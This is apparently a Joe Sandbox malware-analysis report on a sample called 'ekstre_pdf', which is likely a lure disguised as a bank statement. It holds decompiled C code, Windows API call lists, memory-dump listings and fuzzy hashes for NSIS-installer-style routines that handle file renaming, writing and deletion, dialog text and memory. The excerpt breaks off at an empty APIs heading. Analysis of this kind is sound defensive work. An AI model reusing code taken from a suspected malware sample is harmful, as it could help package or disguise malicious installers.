CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00468908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00469108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00469108,C0000000,00000004,00469108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00468508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,004E8000,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

[Rename], xrefs: 0040626C, 0040627E
%ls=%ls, xrefs: 004061F8

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 8ccecb1632ad9bb0d745f509b257f30d2e6cacad646e8618504c361711bfe5fb
Instruction ID: 49f02d860173bd8380076dbb51b9a0b66bd8466448a7b68572d6eaec0fa60645
Opcode Fuzzy Hash: 8ccecb1632ad9bb0d745f509b257f30d2e6cacad646e8618504c361711bfe5fb
Instruction Fuzzy Hash: 43312370240716BBC2207B658D48F6B3B6CEF45754F15017EFA42B62C2EE7C9825867E

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404512
0x004045c8
0x00000000
0x004045c8
0x00404523
0x00404527
0x00000000
0x00404541
0x00404541
0x0040454a
0x00000000
0x00000000
0x0040454c
0x00404558
0x0040455b
0x0040455b
0x00404561
0x00404567
0x00404567
0x00404573
0x00404579
0x00404580
0x00404583
0x00404586
0x00404588
0x00404588
0x00404590
0x00404596
0x00404596
0x004045a0
0x004045a5
0x004045a8
0x004045ad
0x004045b0
0x004045b0
0x004045c0
0x004045c0
0x00000000
0x004045c3

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e62
0x00404e6f
0x00404e75
0x00404eb3
0x00404eb3
0x00404ec2
0x00404ec9
0x00000000
0x00404ecb
0x00404e77
0x00404e86
0x00404e8e
0x00404e91
0x00404ea3
0x00404ea9
0x00404eb0
0x00000000
0x00404eb0
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x430218; // 0x4b409
					_t11 =  *0x43c224; // 0x4d178
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(0004B409,00000064,0004D178), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 69d21dbb20076c2794c7ec2d2fedb41fc27257197c87673a5b8525ea5b2e231a
Instruction ID: 954b51e6821ebddc87013448f6d7c49c2ae72f6a66d4374178b2dcd0d0e72839
Opcode Fuzzy Hash: 69d21dbb20076c2794c7ec2d2fedb41fc27257197c87673a5b8525ea5b2e231a
Instruction Fuzzy Hash: 3A014F7064020DABEF209F60DE4AFEA3B79EB04345F008039FA06B51D0DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x47af14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 5d8233d1f2b761e8ca63798cb2d46c49899c6eacb67aa96447ab77ec24e0d817
Instruction ID: e28b6e8262cf21298436b82c1f7554facf0b7db0a0d909de2658a66770ee1ce9
Opcode Fuzzy Hash: 5d8233d1f2b761e8ca63798cb2d46c49899c6eacb67aa96447ab77ec24e0d817
Instruction Fuzzy Hash: 0931C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF454762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 6ED610C7 Relevance: 8.9, APIs: 7, Instructions: 162
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED610C7(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				signed int _t31;
				void* _t32;
				signed int _t34;
				void* _t39;
				void* _t46;
				intOrPtr _t55;
				void* _t59;
				void* _t66;
				void* _t67;
				signed short _t70;
				void* _t71;
				void* _t78;
				signed short _t79;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				signed int _t89;
				void* _t91;
				void _t94;
				void _t95;
				void* _t96;
				void* _t98;
				void* _t100;

				 *0x6ed65040 = _a8;
				 *0x6ed6503c = _a16;
				 *0x6ed65038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6ed65014, E6ED6132B, _t85, _t88);
				_t89 =  *0x6ed65040 * 0x28;
				_v0 = _t89;
				_t96 = E6ED61593();
				_a8 = _t96;
				_t86 = _t96;
				_t70 = _v0 & 0x0000ffff;
				if(_t70 != 0) {
					_t83 = 0xa;
					do {
						_t31 = _t70 & 0x0000ffff;
						_t86 = _t86 + 2;
						_t100 = _t31 - 0x66;
						if(_t100 > 0) {
							_t32 = _t31 - 0x6c;
							if(_t32 == 0) {
								goto L24;
							} else {
								_t39 = _t32 - 4;
								if(_t39 == 0) {
									goto L13;
								} else {
									_t46 = _t39;
									if(_t46 == 0) {
										goto L11;
									} else {
										goto L8;
									}
								}
							}
						} else {
							if(_t100 == 0) {
								_t78 =  *0x6ed6503c;
								_t91 =  *_t78;
								 *_t78 =  *_t91;
								_t79 = _v0;
								_t55 =  *((intOrPtr*)(_t79 + 0xc));
								_a12 = _t55;
								if( *((intOrPtr*)(_t91 + 4)) == 0x2691) {
									E6ED6132E(_t79, _t91 + 8, 0x38);
									_t79 = _v0;
									_t98 = _t98 + 0xc;
									_t55 = _a12;
								}
								 *((intOrPtr*)(_t79 + 0xc)) = _t55;
								GlobalFree(_t91);
								goto L16;
							} else {
								_t59 = _t31 - 0x46;
								if(_t59 == 0) {
									_t95 = GlobalAlloc(0x40, 8 +  *0x6ed65040 * 2);
									 *((intOrPtr*)(_t95 + 4)) = 0x2691;
									_t15 = _t95 + 8; // 0x8
									E6ED6132E(_t15, _v0, 0x38);
									 *_t95 =  *( *0x6ed6503c);
									 *( *0x6ed6503c) = _t95;
									goto L15;
								} else {
									_t66 = _t59 - 6;
									if(_t66 == 0) {
										L24:
										_t33 =  *0x6ed65010;
										if( *0x6ed65010 != 0) {
											E6ED6132E( *0x6ed65038, _t33 + 4, _t89);
											_t71 =  *0x6ed65010;
											_t98 = _t98 + 0xc;
											 *0x6ed65010 =  *_t71;
											GlobalFree(_t71);
											goto L26;
										}
									} else {
										_t67 = _t66 - 4;
										if(_t67 == 0) {
											 *_t86 =  *_t86 + _t83;
											L13:
											GlobalFree(E6ED615EB(E6ED61548(( *_t86 & 0x0000ffff) - 0x30)));
											_t86 = _t86 + 2;
											goto L26;
										} else {
											_t46 = _t67;
											if(_t46 == 0) {
												 *_t86 =  *_t86 + _t83;
												L11:
												GlobalFree(E6ED61638(( *_t86 & 0x0000ffff) - 0x30, E6ED61593()));
												_t86 = _t86 + 2;
												goto L16;
											} else {
												L8:
												if(_t46 == 1) {
													_t94 = GlobalAlloc(0x40, _t89 + 4);
													_t11 = _t94 + 4; // 0x4
													E6ED6132E(_t11,  *0x6ed65038, _v0);
													 *_t94 =  *0x6ed65010;
													 *0x6ed65010 = _t94;
													L15:
													_t98 = _t98 + 0xc;
													L16:
													_t89 = _v0;
													L26:
													_t83 = 0xa;
												}
											}
										}
									}
								}
							}
						}
						_t34 =  *_t86 & 0x0000ffff;
						_t70 = _t34;
					} while (_t34 != 0);
					_t96 = _a8;
				}
				return GlobalFree(_t96);
			}

0x6ed610cd
0x6ed610d7
0x6ed610e1
0x6ed610f5
0x6ed610f8
0x6ed610ff
0x6ed6110e
0x6ed61110
0x6ed61114
0x6ed61116
0x6ed6111d
0x6ed61129
0x6ed6112a
0x6ed6112a
0x6ed6112d
0x6ed61130
0x6ed61133
0x6ed61260
0x6ed61263
0x00000000
0x6ed61265
0x6ed61265
0x6ed61268
0x00000000
0x6ed6126e
0x6ed6126f
0x6ed61272
0x00000000
0x6ed61278
0x00000000
0x6ed61278
0x6ed61272
0x6ed61268
0x6ed61139
0x6ed61139
0x6ed61221
0x6ed6122c
0x6ed61230
0x6ed61232
0x6ed61235
0x6ed61238
0x6ed61240
0x6ed61249
0x6ed6124e
0x6ed61251
0x6ed61254
0x6ed61254
0x6ed61259
0x6ed6125c
0x00000000
0x6ed6113f
0x6ed6113f
0x6ed61142
0x6ed611ec
0x6ed611f5
0x6ed611f8
0x6ed611ff
0x6ed6120c
0x6ed61213
0x00000000
0x6ed61148
0x6ed61148
0x6ed6114b
0x6ed6127d
0x6ed6127d
0x6ed61284
0x6ed61291
0x6ed61296
0x6ed6129c
0x6ed612a2
0x6ed612a7
0x00000000
0x6ed612a7
0x6ed61151
0x6ed61151
0x6ed61154
0x6ed611b5
0x6ed611b8
0x6ed611cd
0x6ed611cf
0x00000000
0x6ed61156
0x6ed61157
0x6ed6115a
0x6ed61196
0x6ed61199
0x6ed611ae
0x6ed611b0
0x00000000
0x6ed6115c
0x6ed6115c
0x6ed6115f
0x6ed61175
0x6ed6117d
0x6ed61181
0x6ed6118c
0x6ed6118e
0x6ed61215
0x6ed61215
0x6ed61218
0x6ed61218
0x6ed612a9
0x6ed612ab
0x6ed612ab
0x6ed6115f
0x6ed6115a
0x6ed61154
0x6ed6114b
0x6ed61142
0x6ed61139
0x6ed612ac
0x6ed612af
0x6ed612b1
0x6ed612ba
0x6ed612ba
0x6ed612c5

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6ED6116B
GlobalFree.KERNEL32(00000000), ref: 6ED611AE
GlobalFree.KERNEL32(00000000), ref: 6ED611CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6ED611E6
GlobalFree.KERNEL32 ref: 6ED6125C
GlobalFree.KERNEL32(?), ref: 6ED612A7
GlobalFree.KERNEL32(00000000), ref: 6ED612BF

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8ec5af7641992df563d25031a551931c53a466fd7241356c956a593340fb5ddd
Instruction ID: dca6f93020a300a666a60f905f21a0eb20df67017bfcae13b0915a77ca6c904d
Opcode Fuzzy Hash: 8ec5af7641992df563d25031a551931c53a466fd7241356c956a593340fb5ddd
Instruction Fuzzy Hash: E851CE71504602DFEB90CFE9C951A6AB7B8FF4A304F004929F98DD7250E735E94ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067c6
0x004067cf
0x004067e6
0x004067e6
0x004067ed
0x004067f9
0x004067f9
0x004067fc
0x004067ff
0x00406804
0x00406806
0x0040680f
0x00406813
0x00406830
0x00406838
0x00406838
0x0040683d
0x0040683f
0x00406842
0x00406847
0x00406848
0x0040684c
0x0040684c
0x0040684d
0x00406854
0x00406856
0x0040685d
0x00000000
0x00000000
0x00406865
0x0040686b
0x00000000
0x00000000
0x00000000
0x0040686b
0x00406870

APIs
